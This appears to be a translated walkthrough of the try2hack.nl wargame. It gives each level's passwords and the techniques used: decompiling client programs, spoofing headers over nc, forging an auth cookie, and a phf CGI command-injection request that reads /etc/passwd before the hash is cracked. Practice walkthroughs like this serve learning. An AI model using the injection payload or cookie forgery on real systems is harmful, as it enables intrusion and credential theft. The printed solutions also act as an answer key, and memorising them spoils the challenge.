Let's start at the entrance, level 1:
http://www.try2hack.nl/levels/
Just view the page source and you will see:
if (passwd =="h4x0r") {
alert("Alright! On to level 2...");
location.href = "level2-xfdgnh.xHtml";
}
So the password is h4x0r, and the next level's address is
level2-xfdgnh.xhtml
Level 2 is a Flash check.
Use a Flash decompiler on the site's SWF file, which you can find among the browser's temporary (cache) files.
In the decompiled ActionScript there is this fragment:
on (release) {
if ((txtUsername == "try2hack") and (txtPassWord == "irtehh4x0r!")) {
getURL ("level3-.xhtml", "_self");
}
}
So the username is try2hack and the password is irtehh4x0r!
The next level's address is level3-.xhtml
As soon as you enter this level a dialog box pops up; a wrong answer redirects you to another page. Hit Stop the moment the redirect starts and view the source, where you can see:
if (pwd==PASSWORD){
alert("Allright!\nEntering Level 4 ...");
location.href = CORRECTSITE;
}
This looks like the key part, but PASSWORD and CORRECTSITE are never assigned anywhere in the page.
Look more carefully and you will find, earlier in the page, <script src="javascript">: that loads an external script file.
So let's go to http://www.try2hack.nl/levels/JavaScript
Ha ha
It contains exactly this:
PASSWORD = "try2hackrawks";
CORRECTSITE = "level4-kdnvxs.xhtml";
WRONGSITE = "http://www.disney.com";
Level 4: the page source contains <applet code="PasswdLevel4.class">
That is the class file it loads:
http://www.try2hack.nl/levels/PasswdLevel4.class
Download it (you need a Java decompiler to open it); the code actually points to level4.
Open http://www.try2hack.nl/levels/level4
Its source contains:
level5-fdvbdf.xhtml
appletking
pieceofcake
That is the answer.
Level 5: http://www.try2hack.nl/levels/level5-fdvbdf.xhtml
It has you download a program written in VB3 (if it complains about a missing runtime library when you run it, search the web for that library). I first examined it with eXeScope, and inside there is: http://www.try2hack.nl/levels/level6-ksghvb.xhtml txtUsername=AlmostAHacker txtPassword=ZqrE01A2d
Could that be the answer? Try it and you will find it is only a decoy on the surface; the real answer requires analyzing the source code. Since the program is written in VB3 we can recover its source with a decompiler, but that tool took me a long time to find, so for everyone's convenience I have bundled it together.
Look at this interface, very old-fashioned, right?
See?
This is the part that actually does the work.
It has now generated the source file; let's open it and take a look:
If edtUsername = Mid(gc0006, 56, 1) & Mid(gc0006, 28, 1) & Mid(gc0006, 35, 1) & Mid(gc0006, 3, 1) & Mid(gc0006, 44, 1) & Mid(gc0006, 11, 1) & Mid(gc0006, 13, 1) & Mid(gc0006, 21, 1) Then
If edtPassword = Mid(gc0006, 45, 1) & Mid(gc0006, 48, 1) & Mid(gc0006, 25, 1) & Mid(gc0006, 32, 1) & Mid(gc0006, 15, 1) & Mid(gc0006, 40, 1) & Mid(gc0006, 25, 1) & Mid(gc0006, 14, 1) & Mid(gc0006, 19, 1) Then
MsgBox "Level 6 can be found at: " & Left$(gc000A, 37) & Mid(gc0006, 21, 1) & Mid(gc0006, 14, 1) & Mid(gc0006, 29, 1) & Mid(gc0006, 32, 1) & Mid(gc0006, 12, 1) & Mid(gc0006, 14, 1) & Mid(gc000A, 44, 6), 0, "Horray!"
End
End If
End If
It also contains the constant gc0006:
Global Const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~&!_$#@()[]{}<\/>"
Global Const gc000A = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"
Everything is already defined, so simply compiling it gives the result:
Try2Hack
ILoveDodi
That is all there is to it; you can compile it and verify for yourself.
We get the next level.
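As an added example (not from the original walkthrough), here is the Mid() reconstruction from the decompiled VB3 listing redone in Python, so the credentials can be checked without compiling anything; vb_mid reproduces VB's 1-based Mid(), and the constant and index lists are copied from the listing above:

```python
# Credential reconstruction from the decompiled level 5 program.
# GC0006 and the index lists are copied from the decompiled VB3 listing;
# vb_mid reproduces VB's 1-based Mid(string, start, length).
GC0006 = r"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~&!_$#@()[]{}<\/>"

# Mid(gc0006, n, 1) positions in the order the VB source concatenates them
USERNAME_POSITIONS = [56, 28, 35, 3, 44, 11, 13, 21]
PASSWORD_POSITIONS = [45, 48, 25, 32, 15, 40, 25, 14, 19]


def vb_mid(s: str, start: int, length: int = 1) -> str:
    """VB Mid(): start is 1-based; a start past the end yields an empty string."""
    if start < 1:
        raise ValueError("VB Mid() requires start >= 1")
    return s[start - 1:start - 1 + length]


def rebuild(positions: list[int], table: str = GC0006) -> str:
    """Concatenate single characters picked from the table, as the VB code does."""
    return "".join(vb_mid(table, pos) for pos in positions)


def level5_credentials() -> tuple[str, str]:
    """Return the (username, password) pair the compiled check compares against."""
    return rebuild(USERNAME_POSITIONS), rebuild(PASSWORD_POSITIONS)


if __name__ == "__main__":
    user, pw = level5_credentials()
    print(f"username={user} password={pw}")
```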
Level 6
Download a program written in VB6.
As for cracking it directly, I recall someone already posted a video of that, so I won't repeat it.
Let's analyze the data it sends instead; we can see that it accesses www.try2hack.nl/levels/level6.data
Let's see what that is.
It looks like some kind of cipher, and its name is given as B*C*N**N.
I searched everywhere and found that this is actually called the Baconian cipher; I have included the detailed material so everyone can read it.
Note this:
The Baconian Cipher:
a AAAAA    g AABBA    n ABBAA    t BAABA
b AAAAB    h AABBB    o ABBAB    u-v BAABB
c AAABA    i-j ABAAA  p ABBBA    w BABAA
d AAABB    k ABAAB    q ABBBB    x BABAB
e AABAA    l ABABA    r BAAAA    y BABBA
f AABAB    m ABABB    s BAAAB    z BABBB
From this we get
username: dabomb
password: encryptionrawks
and the level 7 address:
http://www.try2hack.nl/levels/level7-xfkohc.PHP
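The walkthrough does not reproduce the contents of level6.data, so here is an added Baconian encoder/decoder (not part of the original) built from the 24-letter table above; the sample text is constructed, and the decoder assumes the data is written with the symbols A and B exactly as in that table:

```python
# Baconian cipher with the 24-letter alphabet from the table above:
# i/j share one code and u/v share one code; each letter is 5 symbols of A/B.
BACON_LETTERS = "abcdefghiklmnopqrstuwxyz"  # 24 letters, no j and no v


def bacon_code(index: int) -> str:
    """Five-symbol code for alphabet position `index`: A for binary 0, B for 1."""
    return format(index, "05b").replace("0", "A").replace("1", "B")


LETTER_TO_CODE = {letter: bacon_code(i) for i, letter in enumerate(BACON_LETTERS)}
CODE_TO_LETTER = {code: letter for letter, code in LETTER_TO_CODE.items()}


def bacon_encode(plaintext: str) -> str:
    """Encode letters; j and v fold into i and u as in the 24-letter table."""
    folded = plaintext.lower().replace("j", "i").replace("v", "u")
    return " ".join(LETTER_TO_CODE[ch] for ch in folded if ch in LETTER_TO_CODE)


def bacon_decode(ciphertext: str) -> str:
    """Decode a stream of A/B symbols; anything else (spaces, newlines) is ignored."""
    symbols = "".join(ch for ch in ciphertext.upper() if ch in "AB")
    if len(symbols) % 5:
        raise ValueError("symbol count is not a multiple of 5")
    letters = []
    for i in range(0, len(symbols), 5):
        group = symbols[i:i + 5]
        if group not in CODE_TO_LETTER:  # BBAAA and above are unused in this table
            raise ValueError(f"no letter for group {group}")
        letters.append(CODE_TO_LETTER[group])
    return "".join(letters)


# Constructed sample: the level 6 credentials as they would look in this cipher.
SAMPLE = bacon_encode("dabomb") + "\n" + bacon_encode("encryptionrawks")
```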
It says you must use IE 7.66, which hasn't even been released yet.
How does it know my browser version?
Let's look at the data that is sent:
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Connection: Keep-Alive
See the User-Agent header: it tells the server everything.
So let's change it, replacing MSIE 6.0 with MSIE 7.66.
To send this we naturally use nc:
nc -vv www.try2hack.nl 80
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.66; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Connection: Keep-Alive
The response says: Sorry, but you must use a unix or Linux system
So we change it again:
nc -vv www.try2hack.nl 80
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.66; UNIX; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Connection: Keep-Alive
Now it says: Sorry, but you must get here from a link on the page: http://www.microsoft.com/ms.htm
The request has to arrive from a link on http://www.microsoft.com/ms.htm, so we change it once more and add a Referer header:
nc -vv www.try2hack.nl 80
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.66; UNIX; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Referer: http://www.microsoft.com/ms.htm
Host: www.try2hack.nl
Connection: Keep-Alive
If all of this is too tedious, I recommend a tool; the whole process can be demonstrated as follows.
We get the level 8 address: level8-balnrg.xhtml
See this: /cgi-bin/phf
This is actually the signature of a well-known old CGI vulnerability.
A quick search turns it up (learn to use search engines).
Here it is:
http://www.try2hack.nl/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That gives us the information, but the password is hashed; we have a way to crack it as well, see the demonstration below.
See?
We get root / arse
Enter these.
Level 9: http://www.try2hack.nl/levels/level9-gnapei.php
It again asks you to enter credentials, but there doesn't seem to be any vulnerability of the previous kind.
So once more we analyze the data that is sent:
POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-Excel, application/vnd.ms-Powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gnapei.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Content-Length: 51
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
username=2222222&password=222222222222&submit=Enter
The part worth noting is this:
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
Intuitively, the username is admin and the password is yu0aertehbomb.
But after entering them the page shows: There is a problem with your authorization. Please try again:
It must be checking our cookie, and auth=no= in particular is clearly what blocks us.
So we have to forge the cookie.
Let's construct it.
The key part is:
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
and in the body:
username=admin&password=yu0aertehbomb&submit=Enter
Then submit the data again.
The constructed request looks like this:
POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gnapei.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Content-Length: 51
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
username=admin&password=yu0aertehbomb&submit=Enter
Send it with nc.
See? The response reads: Good job! You can find Level 10 at our IRC channels. Go to #try2hack.level10 on irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to continue. See the <a href="../chat/">chat</a> page for more information.
So you are meant to use an IRC client to join #try2hack.level10 on the irc.mediamonks.net server with the key yu0aertehbomb. If that is a level in itself, I don't yet know how to get past the next one.
This is the IRC client.
Wait a moment.
See?
Quite a lot of people in there.
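Level 9 falls because the server believes auth=yes straight out of the client-supplied cookie. As an added illustration (not the site's code), here is that weak check beside a hardened one in Python, where the server only accepts an auth cookie that it signed itself with an HMAC key; the key, the cookie name and the token layout are assumptions:

```python
import hmac
import hashlib

# Constructed server-side secret; a real deployment loads this from configuration.
SERVER_SECRET = b"constructed-secret-for-illustration"


def parse_cookie(header: str) -> dict[str, str]:
    """Split a Cookie header value such as 'a=1; b=2' into a dict."""
    pairs = (part.strip().split("=", 1) for part in header.split(";") if "=" in part)
    return {k.strip(): v.strip() for k, v in pairs}


def weak_is_authorized(cookie_header: str) -> bool:
    """The level 9 style check: trusts whatever the client put in 'auth'."""
    return parse_cookie(cookie_header).get("auth") == "yes"


def sign(username: str) -> str:
    """HMAC-SHA256 over the username with the server's key (hypothetical scheme)."""
    return hmac.new(SERVER_SECRET, username.encode(), hashlib.sha256).hexdigest()


def issue_auth_cookie(username: str) -> str:
    """Set only after a real credential check: the value carries its own MAC."""
    return f"auth={username}.{sign(username)}"


def hardened_is_authorized(cookie_header: str) -> bool:
    """Accept 'auth' only if its MAC was produced with the server's key."""
    token = parse_cookie(cookie_header).get("auth", "")
    username, sep, mac = token.rpartition(".")
    if not sep or not username:
        return False
    return hmac.compare_digest(mac, sign(username))


# The forged cookie from the walkthrough's request, exactly as sent above.
FORGED = "str_username=admin; str_password=yu0aertehbomb; auth=yes"
```

A server-side session id looked up in a store is the more usual design, but either way the client can no longer mint auth=yes on its own.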
(Source: http://www.sheup.com)